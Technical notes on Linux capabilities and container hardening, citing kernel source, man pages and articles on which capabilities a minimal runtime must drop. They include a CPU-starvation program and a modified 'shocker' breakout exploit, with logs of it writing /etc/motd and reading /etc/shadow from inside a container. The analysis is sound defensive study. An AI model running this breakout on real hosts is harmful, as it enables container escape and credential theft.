kernel/kexec_file.c:256@c8d2bc:

SYSCALL_DEFINE5(kexec_file_load, int, kernel_fd, int, initrd_fd,
		unsigned long, cmdline_len, const char __user *, cmdline_ptr,
		unsigned long, flags)
{
	int ret = 0, i;
	struct kimage **dest_image, *image;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;
	[...]
}
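
All three checks above come down to whether the caller holds `CAP_SYS_BOOT`. A process can ask whether that capability is still in its bounding set with `prctl(PR_CAPBSET_READ, ...)`. This is only a sketch, and `in_bounding_set` is a hypothetical helper name, not something from `contained.c`:

```c
#include <errno.h>
#include <linux/capability.h>
#include <sys/prctl.h>

/* Returns 1 if cap is in the calling thread's bounding set, 0 if it has
   been dropped, or a negative errno value if the kernel rejects cap. */
int in_bounding_set(int cap)
{
	int r = prctl(PR_CAPBSET_READ, (unsigned long)cap, 0UL, 0UL, 0UL);
	return r < 0 ? -errno : r;
}
```

Run inside the container, `in_bounding_set(CAP_SYS_BOOT)` should report 0 once the bounding set has been trimmed.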

kernel/module.c:931@c8d2bc

SYSCALL_DEFINE2(delete_module, const char __user *, name_user,
		unsigned int, flags)
{
	struct module *mod;
	char name[MODULE_NAME_LEN];
	int ret, forced = 0;

	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;
	[...]
}

kernel/module.c:3468@c8d2bc

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

which is called by `init_module` and `finit_module`:

kernel/module.c:3759@c8d2bc

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	pr_debug("init_module: umod=%p, len=%lu, uargs=%p\n",
	       umod, len, uargs);

	err = copy_module_from_user(umod, len, &info);
	if (err)
		return err;

	return load_module(&info, uargs, 0);
}

SYSCALL_DEFINE3(finit_module, int, fd, const char __user *, uargs, int, flags)
{
	struct load_info info = { };
	loff_t size;
	void *hdr;
	int err;

	err = may_init_module();
	if (err)
		return err;

	pr_debug("finit_module: fd=%d, uargs=%p, flags=%i\n", fd, uargs, flags);

	if (flags & ~(MODULE_INIT_IGNORE_MODVERSIONS
		      |MODULE_INIT_IGNORE_VERMAGIC))
		return -EINVAL;

	err = kernel_read_file_from_fd(fd, &hdr, &size, INT_MAX,
				       READING_MODULE);
	if (err)
		return err;
	info.hdr = hdr;
	info.len = size;

	return load_module(&info, uargs, flags);
}

kernel/kmod.c:630@c8d2bc

static int proc_cap_handler(struct ctl_table *table, int write,
			 void __user *buffer, size_t *lenp, loff_t *ppos)
{
	struct ctl_table t;
	unsigned long cap_array[_KERNEL_CAPABILITY_U32S];
	kernel_cap_t new_cap;
	int err, i;

	if (write && (!capable(CAP_SETPCAP) ||
		      !capable(CAP_SYS_MODULE)))
		return -EPERM;

	[...]
}

which is used to authorize requests to load modules.

net/core/dev_ioctl.c:349@c8d2bc

/**
 *	dev_load	- load a network module
 *	@net: the applicable net namespace
 *	@name: name of interface
 *
 *	If a network interface is not present and the process has suitable
 *	privileges this function loads the module. If module loading is not
 *	available in this kernel then it becomes a nop.
 */

void dev_load(struct net *net, const char *name)
{
	struct net_device *dev;
	int no_module;

	rcu_read_lock();
	dev = dev_get_by_name_rcu(net, name);
	rcu_read_unlock();

	no_module = !dev;
	if (no_module && capable(CAP_NET_ADMIN))
		no_module = request_module("netdev-%s", name);
	if (no_module && capable(CAP_SYS_MODULE))
		request_module("%s", name);
}

This also allows processes with only `CAP_NET_ADMIN` to load `netdev-*` modules, and is run on almost every `ioctl` on a network device:

net/core/dev_ioctl.c:381@c8d2bc

/**
 *	dev_ioctl	-	network device ioctl
 *	@net: the applicable net namespace
 *	@cmd: command to issue
 *	@arg: pointer to a struct ifreq in user space
 *
 *	Issue ioctl functions to devices. This is normally called by the
 *	user space syscall interfaces but can sometimes be useful for
 *	other purposes. The return value is the return from the syscall if
 *	positive or a negative errno code on error.
 */

int dev_ioctl(struct net *net, unsigned int cmd, void __user *arg)
{
	[...]
	/*
	 *	See which interface the caller is talking about.
	 */

	switch (cmd) {
	/*
	 *	These ioctl calls:
	 *	- can be done by all.
	 *	- atomic and do not require locking.
	 *	- return a value
	 */
	case SIOCGIFFLAGS:
	case SIOCGIFMETRIC:
	case SIOCGIFMTU:
	case SIOCGIFHWADDR:
	case SIOCGIFSLAVE:
	case SIOCGIFMAP:
	case SIOCGIFINDEX:
	case SIOCGIFTXQLEN:
		dev_load(net, ifr.ifr_name);
		[...]
}

This was pretty surprising to me! I should look into this further.

man 2 nice

DESCRIPTION
	nice() adds inc  to the nice value for  the calling process.
	(A  higher  nice value  means  a  low priority.)   Only  the
	superuser  may specify  a  negative  increment, or  priority
	increase.
	[...]

ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

We’ll compare how much CPU time a busy loop gets on a single-core virtual machine when it runs on the host and when it runs in a container that can set low nice values:

busy_loop.c
/* -*- compile-command: "gcc -Wall -Werror -static busy_loop.c -o busy_loop" -*- */
#include <time.h>
#include <sys/times.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	struct timespec now = {0};
	struct timespec then = {0};
	clock_gettime(CLOCK_MONOTONIC, &then);
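	/* Seconds are scaled by 5e9 rather than 1e9, so this loop spins for
	   about 4 seconds of wall-clock time, not 20. */
	do {
		clock_gettime(CLOCK_MONOTONIC, &now);
	} while ((now.tv_sec - then.tv_sec) * 5e9
		 + now.tv_nsec - then.tv_nsec < 20e9);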
	/* how much cpu time did we get? */
	struct tms tms = {0};
	if (times(&tms) == -1) {
		fprintf(stderr, "++ times failed: %m\n");
		return 1;
	}
	/*  "The tms_utime field contains the CPU time spent executing
	    instructions of the calling process.  The tms_stime field contains the
	    CPU time spent in the system while executing tasks on behalf of the
	    calling process." */
	printf("ticks: %lu\n", tms.tms_utime + tms.tms_stime);
	return 0;
}
nice_dos.c
/* -*- compile-command: "gcc -Wall -Werror -static nice_dos.c -o nice_dos" -*- */
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (nice(-10) == -1) {
		fprintf(stderr, "++ nice failed: %m\n");
		return 1;
	}
	if (execve("./busy_loop", (char *[]) { "./busy_loop", 0 }, NULL)) {
		fprintf(stderr, "++ execve failed: %m\n");
		return 1;
	}
}
allow_capsysnice.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..4895071 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -44,7 +44,6 @@ int capabilities()
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
-		CAP_SYS_NICE,
 		CAP_SYS_RAWIO,
 		CAP_SYS_RESOURCE,
 		CAP_SYS_TIME,
alpine-kernel-dev:~# (./busy_loop && echo '^ uncontained one' &) && (sudo ./contained.allow_capsysnice -m . -u 0 -c ./nice_dos &)
=> validating Linux version...4.7.6.
=> setting cgroups...memory...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.elKMci...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
ticks: 52
^ uncontained one
ticks: 341
=> cleaning cgroups...done.
alpine-kernel-dev:~#
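
The man page excerpt above also points at `RLIMIT_NICE` as a second way to get a negative nice value. According to `setrlimit(2)`, the ceiling is computed as `20 - rlim_cur`. Here is a sketch of that arithmetic; the function names are hypothetical, and the clamping outside the 1..40 range is a choice I made for this example.

```c
#include <sys/resource.h>

/* setrlimit(2): the ceiling for the nice value is 20 - rlim_cur, with a
   useful range of 1 (nice 19) to 40 (nice -20).  Values outside that
   range are clamped here, which is a choice made for this sketch. */
int lowest_nice_for_rlimit(rlim_t rlim_cur)
{
	if (rlim_cur < 1)
		return 19;
	if (rlim_cur > 40)
		return -20;
	return 20 - (int)rlim_cur;
}

/* Lowest nice value this process may request without CAP_SYS_NICE,
   or 100 (outside the valid range) if getrlimit fails. */
int lowest_unprivileged_nice(void)
{
	struct rlimit lim;
	if (getrlimit(RLIMIT_NICE, &lim))
		return 100;
	return lowest_nice_for_rlimit(lim.rlim_cur);
}
```

So `nice_dos.c`, which asks for -10, would need `RLIMIT_NICE` to be at least 30 to succeed without `CAP_SYS_NICE`.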

man 7 capabilities

	CAP_SYS_RAWIO
		* Perform I/O port operations (iopl(2) and ioperm(2));
		* access /proc/kcore;
		* employ the FIBMAP ioctl(2) operation;
		* open   devices  for   accessing  x86   model-specific
		  registers (MSRs, see msr(4))
		* update /proc/sys/vm/mmap_min_addr;
		* create memory  mappings at addresses below  the value
		  specified by /proc/sys/vm/mmap_min_addr;
		* map files in /proc/bus/pci;
		* open /dev/mem and /dev/kmem;
		* perform various SCSI device commands;
		* perform  certain operations  on hpsa(4)  and cciss(4)
		  devices;
		* perform  a  range  of device-specific  operations  on
		  other devices.

man 4 mem

	/dev/mem is a character device file  that is an image of the
	main memory of  the computer.  It may be  used, for example,
	to examine (and even patch) the system.

	[...]

	It is typically created by:

		mknod -m 660 /dev/mem c 1 1
		chown root:kmem /dev/mem

	The file /dev/kmem is the  same as /dev/mem, except that the
	kernel  virtual  memory  rather   than  physical  memory  is
	accessed.  Since  Linux 2.6.26, this file  is available only
	if  the   CONFIG_DEVKMEM  kernel  configuration   option  is
	enabled.

	It is typically created by:

		mknod -m 640 /dev/kmem c 1 2
		chown root:kmem /dev/kmem

	/dev/port  is similar  to /dev/mem,  but the  I/O ports  are
	accessed.

	It is typically created by:

		mknod -m 660 /dev/port c 1 4
		chown root:kmem /dev/port

man 2 ioperm

	ioperm()  sets  the  port  access permission  bits  for  the
	calling thread for num bits starting from port address from.
	If  turn_on is  nonzero, then  permission for  the specified
	bits is  enabled; otherwise it  is disabled.  If  turn_on is
	nonzero,   the    calling   thread   must    be   privileged
	(CAP_SYS_RAWIO).

man 2 iopl

	iopl()  changes  the  I/O  privilege level  of  the  calling
	process, as specified  by the two least  significant bits in
	level.

	This call is necessary to allow 8514-compatible X servers to
	run under  Linux.  Since these  X servers require  access to
	all 65536 I/O ports, the ioperm(2) call is not sufficient.

	In  addition  to  granting  unrestricted  I/O  port  access,
	running  at a  higher I/O  privilege level  also allows  the
	process to disable interrupts.  This will probably crash the
	system, and is not recommended.

man 7 capabilities

	CAP_SYS_RESOURCE
		* Use reserved space on ext2 filesystems;
		* make ioctl(2) calls controlling ext3 journaling;
		* override disk quota limits;
		* increase resource limits (see setrlimit(2));
		* override RLIMIT_NPROC resource limit;
		* override  maximum  number   of  consoles  on  console
		  allocation;
		* override maximum number of keymaps;
		* allow more  than 64hz  interrupts from  the real-time
		  clock;
		* raise msg_qbytes  limit for a System  V message queue
		  above  the  limit   in  /proc/sys/kernel/msgmnb  (see
		  msgop(2) and msgctl(2));
		* override  the  /proc/sys/fs/pipe-size-max limit  when
		  setting the capacity of a pipe using the F_SETPIPE_SZ
		  fcntl(2) command.
		* use F_SETPIPE_SZ  to increase the capacity  of a pipe
		  above       the        limit       specified       by
		  /proc/sys/fs/pipe-max-size;
		* override  /proc/sys/fs/mqueue/queues_max  limit  when
		  creating POSIX message queues (see mq_overview(7));
		* employ prctl(2) PR_SET_MM operation;
		* set /proc/PID/oom_score_adj to a value lower than the
		  value last set by a process with CAP_SYS_RESOURCE.

Brad Spengler agrees in “False Boundaries and Arbitrary Code Execution”:

No transitions known (to this author, yet): […] CAP_SYS_RESOURCE […]
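
One item in the man page list, "increase resource limits", is easy to poke at from userspace. This is a minimal sketch, assuming `RLIMIT_NOFILE` as the limit to test; `try_raise_hard_nofile` is a hypothetical name.

```c
#include <errno.h>
#include <sys/resource.h>

/* Try to raise the hard RLIMIT_NOFILE limit by one.
   Returns 0 if the kernel allowed it (the old limit is then restored),
   1 if the hard limit is already RLIM_INFINITY, or a negative errno
   value such as -EPERM when the raise is refused. */
int try_raise_hard_nofile(void)
{
	struct rlimit old, raised;
	if (getrlimit(RLIMIT_NOFILE, &old))
		return -errno;
	if (old.rlim_max == RLIM_INFINITY)
		return 1;

	raised = old;
	raised.rlim_max = old.rlim_max + 1;
	if (setrlimit(RLIMIT_NOFILE, &raised))
		return -errno;

	/* Lowering a hard limit needs no privilege, so put it back. */
	setrlimit(RLIMIT_NOFILE, &old);
	return 0;
}
```

Without `CAP_SYS_RESOURCE` I’d expect this to return `-EPERM`, which is what keeps the limits set by the container from being undone.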

It turns out that you can break important things by altering the time. “Authenticated Network Time Synchronization” describes some of these:

The importance of accurate time for security. There are many examples of security mechanisms which (often implicitly) rely on having an accurate clock:

Certificate validation in TLS and other protocols. Validating a public key certificate requires confirming that the current time is within the certificate’s validity period. Performing validation with a slow or inaccurate clock may cause expired certificates to be accepted as valid. A revoked certificate may also validate if the clock is slow, since the relying party will not check for updated revocation information.

Ticket verification in Kerberos. In Kerberos, authentication tickets have a validity period, and proper verification requires an accurate clock to prevent authentication with an expired ticket.

HTTP Strict Transport Security (HSTS) policy duration. HSTS allows website administrators to protect against downgrade attacks from HTTPS to HTTP by sending a header to browsers indicating that HTTPS must be used instead of HTTP. HSTS policies specify the duration of time that HTTPS must be used. If the browser’s clock jumps ahead, the policy may expire re-allowing downgrade attacks. A related mechanism, HTTP Public Key Pinning also relies on accurate client time for security.

For clients who set their clocks using NTP, these security mechanisms (and others) can be attacked by a network-level attacker who can intercept and modify NTP traffic, such as a malicious wireless access point or an insider at an ISP. In practice, most NTP servers do not authenticate themselves to clients, so a network attacker can intercept responses and set the timestamps arbitrarily. Even if the client sends requests to multiple servers, these may all be intercepted by an upstream network device and modified to present a consistently incorrect time to a victim. Such an attack on HSTS was demonstrated by Selvi, who provided a tool to advance the clock of victims in order to expire HSTS policies. Malhotra et al. present a variety of attacks that rely on NTP being unauthenticated, further emphasizing the need for authenticated time synchronization.
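
The certificate case from that quote fits in a few lines. This is a deliberately simplified sketch with hypothetical function names; a real TLS stack checks far more than this, but the time comparison is where a skewed clock does its damage.

```c
#include <time.h>

/* Hypothetical, simplified validity check: only the time comparison
   that a certificate validator performs. */
int within_validity_period(time_t now, time_t not_before, time_t not_after)
{
	return now >= not_before && now <= not_after;
}

/* What a relying party concludes when its clock is off by skew seconds
   (a negative skew means the local clock is slow). */
int accepted_with_skew(time_t true_now, long skew,
		       time_t not_before, time_t not_after)
{
	return within_validity_period(true_now + skew, not_before, not_after);
}
```

A certificate that expired 500 seconds ago is rejected with an accurate clock but accepted if the clock can be pushed back by 600 seconds, which is what a process that can set the system time is able to do.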

man 7 capabilities

       CAP_WAKE_ALARM (since Linux 3.0)
	      Trigger something that will wake up the system (set
	      CLOCK_REALTIME_ALARM and CLOCK_BOOTTIME_ALARM timers).

I had trouble finding more information about these, but “Waking systems from suspend” on LWN goes into more detail:

these timers are exposed to user space via the standard POSIX clocks and timers interface, using the new the CLOCK_REALTIME_ALARM clockid. The new clockid behaves identically to CLOCK_REALTIME except that timers set against the _ALARM clockid will wake the system if it is suspended.
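
A quick way to see the capability check from userspace is to try to create such a timer. Note that this sketch uses `timerfd_create` rather than the POSIX timer interface the quote talks about, only because it avoids linking librt on older glibc; `try_wake_alarm_timer` is a hypothetical name.

```c
#include <errno.h>
#include <sys/timerfd.h>
#include <time.h>
#include <unistd.h>

#ifndef CLOCK_REALTIME_ALARM
#define CLOCK_REALTIME_ALARM 8	/* value from the Linux uapi headers */
#endif

/* Try to create a timer on CLOCK_REALTIME_ALARM.
   Returns 0 if the kernel allowed it, or a negative errno value
   (for example -EPERM without CAP_WAKE_ALARM). */
int try_wake_alarm_timer(void)
{
	int fd = timerfd_create(CLOCK_REALTIME_ALARM, 0);
	if (fd < 0)
		return -errno;
	close(fd);
	return 0;
}
```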

Brad Spengler’s “False Boundaries and Arbitrary Code Execution”:

CAP_DAC_OVERRIDE: generic: same bypass as CAP_DAC_READ_SEARCH, can also modify a non-suid binary executed by root to execute code with full privileges (modifying a suid root binary for you to execute would require CAP_FSETID, as the setuid bit is cleared on modification otherwise; thanks to Eric Paris). The modprobe sysctl can be modified as mentioned above to execute code with full capabilities.

and of course Sebastian Krahmer’s email:

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at().

He might mean that the combination of both of them is problematic, though, which is absolutely true: with `CAP_DAC_OVERRIDE` and `CAP_DAC_READ_SEARCH`, it’s possible to modify arbitrary files:

shocker_write.patch
48a49,50
> char new_motd[] = "The tea from 2014 kicks your sekurity again\n";
> 
149d150
< 	char buf[0x1000];
161,163c162
< 	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
< 
< 	read(0, buf, 1);
---
> 	       "[***] forward to my friends who drink secury-tea too!      [***]\n");
169c168
< 	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
---
> 	if (find_handle(fd1, "/etc/motd", &root_h, &h) <= 0)
175c174
< 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
---
> 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_WRONLY)) < 0)
178,180c177,179
< 	memset(buf, 0, sizeof(buf));
< 	if (read(fd2, buf, sizeof(buf) - 1) < 0)
< 		die("[-] read");
---
> 	if (write(fd2, new_motd, sizeof(new_motd)) != sizeof(new_motd))
> 		die("[-] write");
> 
182c181
< 	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
---
> 	fprintf(stderr, "[!] Win! /etc/motd written.\n");
allow_capdacreadsearch.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker_write
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.axVxAE...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/motd'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'motd'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[+] Match: motd ino=4325389
[*] Brute forcing remaining 32bit. This can take a while...
[*] (motd) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/motd written.
=> cleaning cgroups...done.

allow_capdacreadsearch.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.bWoGr4...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Jto0pj...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[*] Found gdb
[*] Found ..
[*] Found qemu
[*] Found lirc
[*] Found healthd.conf
[*] Found subuid
[*] Found locale.gen.pacnew
[*] Found gtk-3.0
[*] Found idn.conf
[*] Found wgetrc
[*] Found mime.types
[*] Found texmf
[*] Found request-key.conf
[*] Found xinetd.d
[*] Found ssl
[*] Found ifplugd
[*] Found mpd.conf
[*] Found gimp
[*] Found logrotate.d
[*] Found dhcpcd.conf
[*] Found trusted-key.key
[*] Found resolv.conf
[*] Found gemrc
[*] Found libpaper.d
[*] Found hostname
[*] Found kernel
[*] Found audit
[*] Found request-key.d
[*] Found subgid
[*] Found services
[*] Found protocols
[*] Found profile.d
[*] Found Muttrc.dist
[*] Found audisp
[*] Found default
[*] Found resolv.conf.bak
[*] Found ufw
[*] Found man_db.conf
[*] Found gconf
[*] Found geoclue
[*] Found netconfig
[*] Found nanorc
[*] Found environment
[*] Found crypttab
[*] Found brltty.conf
[*] Found logrotate.conf
[*] Found goaccess.conf
[*] Found nsswitch.conf
[*] Found shadow
[+] Match: shadow ino=4334485
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
[redacted]
=> cleaning cgroups...done.

fs/namei.c:316@c8d2bc:

int generic_permission(struct inode *inode, int mask)
{
	int ret;

	/*
	 * Do the basic permission checks.
	 */
	ret = acl_permission_check(inode, mask);
	if (ret != -EACCES)
		return ret;

	if (S_ISDIR(inode->i_mode)) {
		/* DACs are overridable for directories */
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;
		if (!(mask & MAY_WRITE))
			if (capable_wrt_inode_uidgid(inode,
						     CAP_DAC_READ_SEARCH))
				return 0;
		return -EACCES;
	}
	/*
	 * Read/write DACs are always overridable.
	 * Executable DACs are overridable when there is
	 * at least one exec bit set.
	 */
	if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;

	/*
	 * Searching includes executable on directories, else just read.
	 */
	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
	if (mask == MAY_READ)
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))
			return 0;

	return -EACCES;
}
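
To make it easier to see which capability unlocks what, here is a hypothetical userspace model of the fallback logic in `generic_permission`. It only covers the part that runs after the ordinary mode/ACL check has failed, and `dac_capability_allows` is a name I made up for this sketch.

```c
#include <stdbool.h>

/* Local stand-ins for the kernel's MAY_* bits; the values match
   include/linux/fs.h but only their distinctness matters here. */
enum { MAY_EXEC = 1, MAY_WRITE = 2, MAY_READ = 4 };

/* Hypothetical model of the capability fallback in generic_permission(),
   entered only after the mode/ACL check has already said -EACCES.
   any_exec_bit stands for (inode->i_mode & S_IXUGO) != 0. */
bool dac_capability_allows(bool is_dir, int mask, bool any_exec_bit,
			   bool dac_override, bool dac_read_search)
{
	if (is_dir) {
		if (dac_override)
			return true;
		return !(mask & MAY_WRITE) && dac_read_search;
	}
	if ((!(mask & MAY_EXEC) || any_exec_bit) && dac_override)
		return true;
	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
	return mask == MAY_READ && dac_read_search;
}
```

In this model `CAP_DAC_READ_SEARCH` alone lets you read files and search directories, while writing needs `CAP_DAC_OVERRIDE`.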

man 5 acct gives more useful information about this system than man 2 acct.

`CAP_IPC_OWNER` is only used in `ipcperms`:

ipc/util.c:468@c8d2bc

/**
 * ipcperms - check ipc permissions
 * @ns: ipc namespace
 * @ipcp: ipc permission set
 * @flag: desired permission set
 *
 * Check user, group, other permissions for access
 * to ipc resources. return 0 if allowed
 *
 * @flag will most probably be 0 or S_...UGO from <linux/stat.h>
 */
int ipcperms(struct ipc_namespace *ns, struct kern_ipc_perm *ipcp, short flag)
{
	kuid_t euid = current_euid();
	int requested_mode, granted_mode;

	audit_ipc_obj(ipcp);
	requested_mode = (flag >> 6) | (flag >> 3) | flag;
	granted_mode = ipcp->mode;
	if (uid_eq(euid, ipcp->cuid) ||
	    uid_eq(euid, ipcp->uid))
		granted_mode >>= 6;
	else if (in_group_p(ipcp->cgid) || in_group_p(ipcp->gid))
		granted_mode >>= 3;
	/* is there some bit set in requested_mode but not in granted_mode? */
	if ((requested_mode & ~granted_mode & 0007) &&
	    !ns_capable(ns->user_ns, CAP_IPC_OWNER))
		return -1;

	return security_ipc_permission(ipcp, flag);
}
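
The bit shuffling in `ipcperms` is compact, so here is a hypothetical userspace model of just the mode arithmetic. `ipc_needs_cap_ipc_owner` is my own name; the `is_owner` and `in_group` flags stand in for the uid and gid comparisons the kernel makes.

```c
#include <stdbool.h>

/* Hypothetical model of the mode arithmetic in ipcperms().  flag holds
   the wanted rwx bits (in any of the three octal digits) and mode is the
   object's permission word.  Returns true if the request asks for a bit
   that the object does not grant, which is when CAP_IPC_OWNER is
   consulted. */
bool ipc_needs_cap_ipc_owner(short flag, unsigned short mode,
			     bool is_owner, bool in_group)
{
	int requested_mode = (flag >> 6) | (flag >> 3) | flag;
	int granted_mode = mode;

	if (is_owner)
		granted_mode >>= 6;
	else if (in_group)
		granted_mode >>= 3;

	return (requested_mode & ~granted_mode & 0007) != 0;
}
```

With an object of mode 0600, for example, anyone other than the owner only gets past `ipcperms` by holding `CAP_IPC_OWNER`.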

It’s used in the following places immediately after looking up the IPC object in the IPC namespace:

In the IPC shared memory system, ipc/shm.c@c8d2bc (done after `shm_obtain_object` and `shm_obtain_object_check`):
- ipc/shm.c:869@c8d2bc: shmctl_nolock
- ipc/shm.c:1081@c8d2bc: do_shmat
In the IPC semaphore system, ipc/sem.c@c8d2bc (done after `sem_obtain_object` and `sem_obtain_object_check`):
- ipc/sem.c:1200@c8d2bc: semctl_nolock
- ipc/sem.c:1289@c8d2bc: semctl_setval
- ipc/sem.c:1360@c8d2bc: semctl_main
- ipc/sem.c:1816@c8d2bc: semtimedop
In the IPC message queue system, ipc/msg.c@c8d2bc (done after `msq_obtain_object` and `msq_obtain_object_check`):
- ipc/msg.c:445@c8d2bc: msgctl_nolock
- ipc/msg.c:630@c8d2bc: do_msgsnd
- ipc/msg.c:846@c8d2bc: do_msgrcv

`ipc_check_perms` is another thin layer over it that doesn’t check the IPC namespace.

ipc/util.c:290@c8d2bc

/**
 * ipc_check_perms - check security and permissions for an ipc object
